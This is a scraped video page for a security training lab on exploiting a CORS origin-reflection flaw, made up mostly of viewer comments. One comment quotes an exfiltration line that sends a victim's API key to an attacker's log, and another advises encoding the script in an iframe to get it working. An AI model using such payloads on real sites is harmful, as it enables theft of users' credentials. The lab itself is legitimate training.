CORS - Lab #1 CORS vulnerability with basic origin reflection | Short Video

  Рет қаралды 35,998

Rana Khalil

Rana Khalil

Күн бұрын

Пікірлер: 20
@RanaKhalil101
@RanaKhalil101 2 жыл бұрын
Don't want to wait for the weekly release schedule to gain access to all the videos and want to be added to a discord server where you can ask questions? Make sure to sign up to my course: bit.ly/30LWAtE ✨✨
@曹曹嘉旭
@曹曹嘉旭 3 күн бұрын
In this experiment, why can't I see the log after I input the poc according to your method and click Send to the victim api key in
@TheBroadwood
@TheBroadwood 2 жыл бұрын
Can you explain how the fetch("/log?key=" + xhr.responseText) forges a GET-Request from the administrator to our server? Because since we got two GET-Requests in our access log from the admin, i'm wondering where the second one with the submitted data was forged in the code.
@edwinmendoza8981
@edwinmendoza8981 2 жыл бұрын
Thanks!
@RanaKhalil101
@RanaKhalil101 Жыл бұрын
Thank you!
@Fahodinho
@Fahodinho Жыл бұрын
is it me or this doesn't work anymore?
@Skaxarrat
@Skaxarrat 6 ай бұрын
Not working for me either.
@adinaliana8071
@adinaliana8071 4 ай бұрын
same
@itssmezeddd
@itssmezeddd Ай бұрын
@@adinaliana8071 any updates? have u fully resolved this problem? its not working for me too
@itssmezeddd
@itssmezeddd Ай бұрын
@@adinaliana8071 what you need to do is to obfuscate the whole script within the srcdoc, you could use the burp decoder to url-encode it
@faique2995
@faique2995 2 жыл бұрын
Hi, Can we send other headers excluding cookies with the cors request
@whisperthewolf1724
@whisperthewolf1724 2 жыл бұрын
Hey Rana,can you solve and explain portswigger's xss labs?,i m really having trouble with it
@kanishksharan
@kanishksharan 8 ай бұрын
Yeah right. Rana is at your service, your Majesty.
@gyangaha109
@gyangaha109 2 жыл бұрын
thank you
@alexwell5340
@alexwell5340 2 жыл бұрын
👍👍👍👍👍
@faique2995
@faique2995 2 жыл бұрын
incorrect thumbnail used
@RanaKhalil101
@RanaKhalil101 2 жыл бұрын
Thank you! I fixed it :)
@TANKBM
@TANKBM 2 жыл бұрын
لايك وانا مغمض عيوني
@Eric-EMP
@Eric-EMP 2 жыл бұрын
Hey! Did you know that you Look like that beautiful Women From Mr Robot Who was also a Hacker?.😍😍
@Skaxarrat
@Skaxarrat 6 ай бұрын
Take it down a notch, fam
Cross-Origin Resource Sharing (CORS) | Complete Guide
52:17
Rana Khalil
Рет қаралды 73 М.
小丑揭穿坏人的阴谋 #小丑 #天使 #shorts
00:35
好人小丑
Рет қаралды 6 МЛН
НИКИТА ПОДСТАВИЛ ДЖОНИ 😡
01:00
HOOOTDOGS
Рет қаралды 2,9 МЛН
CSRF - Lab #1 CSRF vulnerability with no defenses | Long Version
23:31
Hands-on guide to CORS
9:31
The Cyber Mentor
Рет қаралды 6 М.
CORS in 100 Seconds
2:31
Fireship
Рет қаралды 568 М.
CSRF - Lab #1 CSRF vulnerability with no defenses | Short Version
11:41
The Same Origin Policy - Hacker History
12:19
LiveOverflow
Рет қаралды 108 М.